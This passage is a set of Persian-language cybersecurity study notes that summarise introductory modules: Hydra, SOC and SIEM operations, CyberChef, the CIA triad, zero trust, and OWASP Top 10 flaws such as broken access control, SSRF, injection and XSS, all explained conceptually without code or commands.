این کدها نشاندهنده وجود مشکل در خودِ درخواست هستند؛ مثلاً آدرس اشتباه است یا برخی اطلاعات لازم (مانند احراز هویت) ارسال نشده است.
Server Error Responses (500-599)این کدها یعنی سرور هنگام تلاش برای انجام درخواست با خطا مواجه شده است؛ این مشکلات معمولاً مربوط به سمت سرور هستند و تقصیر کلاینت (کاربر) نیست.
در این ماژول ابزار Hydra معرفی می شود و کاربرد آن شرح داده میشود.
Hydra یک نرمافزار متنباز، فوقالعاده سریع و بسیار محبوب در حوزه تست نفوذ و امنیت شبکه است که به صورت پیشفرض در توزیعهایی مانند کالی لینوکس قرار دارد.
کاربرد اصلی این ابزار، اجرای حملات دیکشنری و بروتفورس (Brute-Force) آنلاین است؛ به این معنی که با تست همزمان هزاران نام کاربری و رمز عبور بر روی پروتکلهای مختلف (نظیر SSH ،FTP ،RDP و فرمهای لاگین وبسایتها)، به متخصصان امنیت و هکرها کمک میکند تا میزان مقاومت و ضعف مکانیزمهای احراز هویتِ یک سیستم را ارزیابی کنند.
در این ماژول دنیای امنیت از دید تدافعی بررسی می شود.
امنیت تدافعی (Defensive Security) یا تیم آبی: هنر محافظت از داراییهای دیجیتال، پیشگیری از تهدیدات و پایش مداوم شبکه برای کشف و مسدودسازی هرگونه دسترسی غیرمجاز است.
مرکز عملیات امنیت (SOC): خط مقدم دفاع است که در آن یاد میگیرید چطور ترافیک شبکه را به صورت ۲۴ ساعته مانیتور کرده و هشدارهای امنیتی را برای شناسایی حملات، ارزیابی و مدیریت کنید.
جرمشناسی دیجیتال و پاسخ به حوادث (DFIR): به شما آموزش میدهد که در صورت وقوع یک رخداد امنیتی، چطور شواهد دیجیتالی را جمعآوری کنید، ردپای مهاجم را بیابید و آسیب را به حداقل برسانید.
تحلیل بدافزار (Malware Analysis): فرآیندی است که در آن یاد میگیرید فایلهای مشکوک و مخرب را در محیطی امن (سندباکس) کالبدشکافی کرده و نوع رفتار و هدف آنها را کشف کنید.
هوش تهدید (Threat Intelligence): به شما کمک میکند تا اطلاعات، تاکتیکها و ابزارهای مورد استفاده مهاجمان را بشناسید و قبل از اینکه هدفی برای حمله قرار بگیرید، سیستم دفاعی خود را تقویت کنید.
SOC Fundamentals
تسک1: در بخش سرویس SOC معرفی می شود.
SOC(Security Operations Center) وظیفه تیم soc این است که به صورت 24 ساعته رفتارهای شبکه را مانیتور کند و مواردی که به نظر مشکوک می رسند را به صورت کامل بررسی کنند و در صورت شناسایی مخرب آن را به تیم Incident Response ارجاع دهند.
تسک2: در این تسک به دو مفهوم Detection و Response اشاره می شود.
Detection: پایش مستمر ترافیک، لاگها و سیستمها برای شکار و کشف سریع هرگونه فعالیت مشکوک، بدافزار یا ناهنجاری است؛ این فرآیند مانند یک سیستم هشدار اولیه عمل میکند تا حضور مهاجم را قبل از ایجاد آسیب جدی فاش کند.
Response: شامل تمامی اقدامات فوری، فنی و استراتژیک پس از کشف یک تهدید، مانند ایزوله کردن سیستم آلوده و قطع دسترسی مهاجم است؛ مجموعهای از کارها که با هدف خنثیسازی حمله، کاهش خسارت و بازگرداندن امن شبکه به حالت عادی انجام میشود.
تسک3: در این تسک در رابطه با انواع سمت های شغلی در SOC توضیح داده می شود.
SOC Analyst (Level 1)
SOC Analyst (Level 2)
SOC Analyst (Level 3)
Security Engineer
Detection Engineer
SOC Manager
تسک4: در این بخش به فرایندهایی که باید توسط تیم SOC انجام شود اشاره می شود.
یکی از فرایندهای مهم که توسط SOC Analyst (Level 1) باید انجام شود، Alert Triage می باشد.
برای تریاژ الرتینگ باید 5 سوال رو همیشه در نظر داشت:
What?
When?
Where?
Who?
Why?
یکی از فرایندهای دیگر که اهمیت زیادی دارد، Reporting است.
و در نهایت فرایند Incident response و Forensics از مهم ترین فعالیت هایی است که تیم SOC انجام می دهد.
تسک5: در این تسک به تکنولوژی هایی که در SOC استفاده می شود اشاره می شود.
سامانه SIEM (مدیریت اطلاعات و رویدادهای امنیتی) مانند مغز متفکر شبکه عمل میکند که وظیفه جمعآوری، یکپارچهسازی و تحلیل لحظهای تمام رویدادها را بر عهده دارد. تجهیزات و ابزارهای حیاتی مانند Firewall (از سطح ترافیک شبکه) و EDR (از سطح سیستمهای پایانی)، تمام لاگها و هشدارهای خود را به صورت مداوم به این سامانه مرکزی ارسال میکنند. این تجمیع دادهها به SIEM اجازه میدهد تا با همبستهسازی (Correlation) لاگهای مختلف، الگوهای پنهان حملات را سریعاً کشف کند.
تسک2: در این تسک به این نکته اشاره می کند که در یک شبکه از تجهیزات مختلفی لاگ گرفته می شود و به سمت SIEM ارسال می شود.
دستگاههای شبکه مدام لاگهای متعددی تولید میکنند که به دو دسته میزبانمحور (Host-Centric مثل اجرای فرآیندها و تغییرات رجیستری) و شبکهمحور (Network-Centric مثل ترافیک وب و اتصالات SSH) تقسیم میشوند.
بررسی این لاگها به دلیل چالشهایی چون پراکندگی در دستگاههای مختلف، عدم وجود مدیریت مرکزی و تفاوت در فرمت ساختاری آنها، کار تحلیل را بسیار دشوار میکند.
علاوه بر این، حجم انبوه دادهها تحلیل دستی را غیرممکن میسازد و بررسی جداگانه آنها دیدِ محیطی محدودی به تحلیلگر میدهد، در حالی که کشف حملات نیازمند همبستهسازی این لاگها با یکدیگر است.
تسک3: در این تسک به علت استفاده از SIEM اشاره می شود و اینکه این ابزار چه قابلیت هایی رو ارائه می دهد.
Data Aggregation(تجمیع دادهها): تمام لاگها و دادههای امنیتی را از سراسر شبکه، سرورها و تجهیزات مختلف در یک نقطه مرکزی جمعآوری و یکپارچه میکند.
Data Correlation (همبستهسازی دادهها): لاگهای پراکنده و به ظاهر بیارتباط را بر اساس قوانین هوشمند تحلیل میکند تا الگوها و ردپای حملات پیچیده را کشف کند.
Alerting & Notification (هشداردهی): به محض شناسایی یک رفتار آنومالی یا تطابق فعالیتها با الگوهای حمله، بلافاصله هشدارهای بلادرنگ (Real-time) را برای تحلیلگران SOC ارسال میکند.
Dashboards & Visualization (داشبوردها و تصویرسازی): دادههای پیچیده امنیتی را در قالب نمودارها و واسطهای گرافیکی ساده نمایش میدهد تا وضعیت امنیت شبکه در یک نگاه قابل ارزیابی باشد.
Compliance & Reporting (انطباق و گزارشدهی): لاگها را سازماندهی کرده و گزارشهای دورهای استاندارد را جهت پایبندی به الزامات قانونی و چارچوبهای امنیتی (مثل ISO 27001 یا PCI-DSS) تولید میکند.
Retention & Storage (نگهداری و ذخیرهسازی): لاگهای جمعآوری شده را به صورت امن و ساختاریافته در طولانیمدت ذخیره میکند تا در فرآیندهای جرمشناسی دیجیتال (Forensics) و ردیابی حملات گذشته قابل استفاده باشند.
تسک4: در این تسک در رابطه با انواع Log Source های متفاوت توضیح داده می شود.
Log Sources: تمام دستگاههای درون شبکه در صورت انجام هرگونه فعالیت، رویدادها را ثبت کرده و به عنوان منبع تولید لاگ شناخته میشوند.
Windows Machine: سیستمعامل ویندوز رویدادها را با شناسه منحصربهفرد (Event ID) ثبت میکند که از طریق ابزار Event Viewer قابل مشاهده و ارسال به SIEM هستند.
Linux Machine: لینوکس انواع لاگهای سیستم، خطاها و احراز هویتها را در مسیرهای مشخصی از پوشه /var/log (مانند auth.log و cron) ذخیره میکند.
Web Server: مانیتور کردن لاگِ درخواستها و پاسخهای سرور وب (مانند آپاچی در مسیر /var/log/httpd) برای شناسایی و پیشگیری از حملات وب بسیار حیاتی است.
Log Ingestion: فرآیند ورود، جذب و انتقال لاگهای جمعآوری شده از منابع مختلف به درون سامانه SIEM جهت تجزیه، تحلیل و نرمالسازی است.
Agent / Forwarder: یک نرمافزار سبک است که روی سیستم پایانی (Endpoint) نصب شده و وظیفه جمعآوری و ارسال خودکار لاگها به سرور SIEM را دارد.
Syslog: یک پروتکل استاندارد و پرکاربرد شبکه برای جمعآوری و ارسال بلادرنگ (Real-time) لاگها از سیستمها و تجهیزات مختلف به یک مقصد مرکزی است.
Manual Upload: قابلیتی در سامانههای SIEM است که امکان بارگذاری دستیِ فایلهای لاگ آفلاین را برای تحلیلهای سریع و موقت فراهم میکند.
Port-Forwarding: تنظیم سامانه SIEM برای گوش دادن به یک پورت خاص شبکهای است تا دستگاهها لاگهای خود را مستقیماً به آن درگاهِ شنود ارسال کنند.
تسک5: در این تسک به مبحث Alerting اشاره می شود و توضیحاتی داده می شود در رابطه با usecase های متفاوت برای Detect کردن رفتار هایی که پتانسیل مخرب بودن را دارند.
در این ماژول ابزار CyberChef آموزش داده می شود.
ابزار CyberChef (معروف به چاقوی سوئیسی سایبری) یک برنامه تحت وب و بسیار محبوب است که به عنوان دستیار همهفنحریفِ تحلیلگران امنیت و SOC شناخته میشود. این ابزار با استفاده از یک مکانیزم بصری بر پایه کشیدن و رها کردن (Drag-and-Drop)، به شما اجازه میدهد تا به راحتی «دستورالعملها» یا همان Recipes مختلف را برای تغییر شکل دادهها بسازید. کاربرد اصلی آن در کدگذاری/رمزگشایی سریع (مثل Base64 و Hex)، تحلیل رشتههای مشکوک، استخراج دادهها و تولید انواع هشها است که تمام این پردازشها به صورت کاملاً امن و محلی درون مرورگر خودتان انجام میشود.
تسک2: در این بخش مثلث CIA توضیح داده می شود. ای مثلث شامل سه ضلع Confidentiality ، Integrity ، Availability می باشد. در طراحی یک سیستم باید در نظر داشت که بالانسی از این سه موارد پیاده سازی شود.
محرمانگی (Confidentiality): تضمین میکند که تنها افراد یا گیرندگان مجاز و مورد نظر بتوانند به دادهها دسترسی داشته باشند.
یکپارچگی (Integrity): هدف آن تضمین این است که دادهها دستخوش تغییر نشوند؛ علاوه بر این، در صورت وقوع هرگونه دستکاری و تغییر، بتوانیم آن را تشخیص دهیم.
دسترسپذیری (Availability): هدف آن تضمین این است که سیستم یا سرویسِ مورد نظر در هنگام نیاز، همواره در دسترس باشد.
تسک3: در این تسک به مثلث DAD اشاره می شود که دقیقا بر عکس مثلث CIA می باشد. شامل سه ضلع Disclosure ، Alteration، Destruction/Denial.
افشا (Disclosure): سرقت و انتشار عمومی سوابق پزشکی بیماران، باعث نقض محرمانگی و ایجاد خسارت شدید برای مراکز درمانی میشود.
تغییر (Alteration): دستکاری پروندههای پزشکی توسط مهاجم میتواند منجر به تجویز درمان اشتباه شده و مستقیماً جان بیمار را به خطر بیندازد.
تخریب/انکار (Destruction/Denial): از کار انداختن پایگاههای داده، دسترسی پزشکان به سوابق را مسدود کرده و کل روند درمان و فعالیت مرکز را فلج میکند.
تسک5: در این بخش به مفهوم Defence in Depth یا دفاع در عمق اشاره می شود.
دفاع در عمق (Defense in Depth): یک استراتژی جامع در امنیت سایبری است که به جای تکیه بر یک مانع واحد، از لایههای دفاعی متعدد و مستقل در برابر تهدیدات استفاده میکند. در این رویکرد، اگر مهاجم بتواند از یک لایه (مثلاً فایروال) عبور کند، با لایههای دفاعی بعدی (مانند آنتیویروس یا رمزنگاری دادهها) روبرو خواهد شد. هدف اصلی این روش، کُند کردن روند حمله، خرید زمان برای شناسایی تهدید و کاهش احتمال موفقیت کامل مهاجم است.
تسک7: در این بخش به دو مفهوم Zero Trust و Trust but Verify اشاره می شود.
Trust but Verify : مدل سنتی؛ فرض میکند هر کس داخل شبکه است امن بوده و احراز هویت را فقط یکبار در مرز ورودی انجام میدهد.
Zero Trust : مدل مدرن؛ با شعار «هرگز اعتماد نکن، همیشه تأیید کن»، موقعیت مکانی را ملاک قرار نمیدهد و هر درخواست را در هر لحظه مجدداً احراز هویت میکند.
تسک8: در این بخش به مفاهیم تهدید و ریسک اشاره میشود.
آسیبپذیری (Vulnerability): آسیبپذیر به معنای در معرضِ حمله یا آسیب بودن است. در امنیت اطلاعات، آسیبپذیری همان نقطه ضعف (Weakness) موجود در سیستم است.
تهدید (Threat): یک خطر بالقوه و احتمالی است که با این نقطه ضعف یا آسیبپذیری مرتبط است و میتواند از آن سوءاستفاده کند.
ریسک (Risk): به میزان احتمالِ اکسپلویت (سوءاستفاده) یک آسیبپذیری توسط عامل تهدید، و پیامدها و خسارتهای ناشی از آن بر روی کسبوکار مربوط میشود.
Careers in Cyber:
در این ماژول به انواع عنوان های شغلی در حوزه Cyber Security اشاره می شود.
تحلیل امنیت (Security Analysis): تمرکز بر پایش مداوم شبکه، تحلیل لاگها و بررسی هشدارهای امنیتی برای کشف و پاسخ سریع به حملات در لحظه.
مهندسی امنیت (Security Engineering): تمرکز بر طراحی، پیادهسازی و نگهداری ابزارها و زیرساختهای دفاعی (مثل فایروال و SIEM) برای مقاومسازی شبکه.
تست نفوذ (Penetration Test): تمرکز بر ارزیابی تهاجمی سیستمها از طریق شبیهسازی قانونیِ حملات هکرها برای کشف و رفع آسیبپذیریها قبل از سوءاستفاده از آنها.
تسک2: در این تسک به مفاهیم Identity، Authentication،Authorisation ،Accountability اشاره می شود.
هویت (Identity): حساب کاربری منحصربهفرد (مانند شناسه کاربری/ایمیل) که نشاندهنده یک شخص یا سرویس است.
احراز هویت (Authentication): اثبات آن هویت (با استفاده از ابزارهایی مثل رمز عبور، رمز یکبار مصرف/OTP و پاسکیها).
مجوزدهی / تعیین سطح دسترسی (Authorization): مشخص کردن کارهایی که آن هویت اجازه انجام دادنشان را دارد.
پاسخگویی و رهگیری (Accountability): ثبت رویدادها و هشداردهی درباره اینکه چه کسی، چه کاری را، در چه زمانی و از کجا انجام داده است.
تسک3: مفهوم Broken Access Control را توضیح می دهد.
Broken Access Control کنترل دسترسی شکسته: یک نقص امنیتی است که به کاربران اجازه میدهد به دادهها، صفحات یا عملکردهایی خارج از محدوده مجوز قانونی خود دسترسی پیدا کنند.
در این آسیبپذیری، مهاجم با دور زدن محدودیتهای سیستمی میتواند سطح دسترسی خود را به ادمین ارتقا داده یا اطلاعات حساس سایر کاربران را مشاهده و دستکاری کند.
تسک4: در این تسک مفهوم Authentication Failure بررسی می شود.
شکست در احراز هویت (Authentication Failure): زمانی رخ میدهد که برنامه به دلیل نقصهای فنی یا منطقی (مانند عدم تشخیص تفاوت میان کلمات همآوا مثل admin و aDmiN)، گذرواژههای ضعیف یا نبود محدودیت در تعداد دفعات ورود (Rate Limit)، نتواند هویت کاربر را بهدرستی اعتبارسنجی کند.
وجود این آسیبپذیریها به مهاجم اجازه میدهد تا با روشهایی مثل شمارش نامهای کاربری، جعل نشستها (Sessions) یا دور زدن فرآیند ثبتنام، به حساب کاربران دیگر نفوذ کرده و دسترسی غیرمجاز بگیرد.
تسک5: در این تسک به اهمیت Accountability اشاره می شود.
نقص در لاگگیری و مانیتورینگ: عدم ثبت رویدادهای امنیتی، مانع شناسایی و بررسی حملات میشود؛ در حالی که لاگگیری استاندارد، پایهواساس پاسخگویی و اثبات اقدامات مهاجم (چه کسی، چه کاری، چه زمانی و از کجا) است.
اشکالات رایج: این ضعفها معمولاً به صورت نبود لاگهای ورود، هشدارهای مبهم، عدم ثبت حملات بروتفورس یا تغییر دسترسیها، دوره نگهداری کوتاه و ذخیرهسازی ناامن لاگها (امکان دستکاری توسط هکر) نمایان میشوند.
OWASP Top 10 2025: Application Design Flaws
این تسک به نواقص طراحی یک اپلیکیشن اشاره می کند.
سرفصل های مهم این ماژول:
نقص احراز هویت: چگونگی دور زدن مکانیزمهای ورود با ترفندهای منطقی (مثل ثبتنام با کاراکترهای مشابه) یا سوءاستفاده از پسوردهای ضعیف.
پیکربندی نادرست (Misconfiguration): خطرات ناشی از تغییر ندادن پسوردهای پیشفرض، پورتهای بازِ بیمورد و نمایش خطاهای حساس سرور.
اجزای قدیمی و آسیبپذیر: خطرات استفاده از کتابخانهها، فریمورکها یا افزونههای منسوخشدهای که اکسپلویت عمومی دارند.
نقص لاگگیری و مانیتورینگ: چطور نبودِ لاگهای استاندارد یا حذف آنها، تیم دفاعی (SOC) را در زمان وقوع حادثه کاملاً فلج و نابینا میکند.
آسیبپذیری SSRF: فریب دادن سرور وب برای ارسال درخواستهای مخرب به شبکه داخلی و سرویسهای پشت فایروال.
نقص یکپارچگی نرمافزار/داده: خطرات اعتمادِ بدون اعتبارسنجی به فایلها، کدهای شخص ثالث یا آپدیتهای نرمافزاری بدون امضا.
Insecure Data Handling
در این ماژول به این نکته اشاره می شود که اگر دیتا به صورت امن مدیریت نشود باعث چه خطراتی رو به همراه داره. و به روش هایی برای مدیریت دیتا به صورت امن اشاره می شود.
مفاهیم مهم اشاره شده در این ماژول:
Injection(تزریق مخرب): فریب دادن مفسر سرور با فرستادن کدهای مخرب در ورودیها برای اجرای دستورات غیرمجاز (مانند SQLi برای دسترسی به دیتابیس یا OS Command Injection).
Cryptographic Failures (نقصهای رمزنگاری): خطرات ناشی از عدم رمزنگاری دادههای حساس، یا استفاده از الگوریتمهای قدیمی و منسوخشده که منجر به لو رفتن اطلاعات میشود.
Insecure Design (طراحی ناامن): نقصهای ریشهای در معماری و مهندسی اولیه سیستم که پیش از کدنویسی شکل گرفتهاند و با وصلهکردنِ ساده کدهای فنی برطرف نمیشوند.
Cross-Site Scripting - XSS (تزریق کد سمت کاربر): نوع خاصی از تزریق که در آن مهاجم اسکریپتهای جاوااسکریپت را در مرورگر کاربران دیگر اجرا کرده و نشستها (Sessions) یا کوکیهای آنها را میرباید.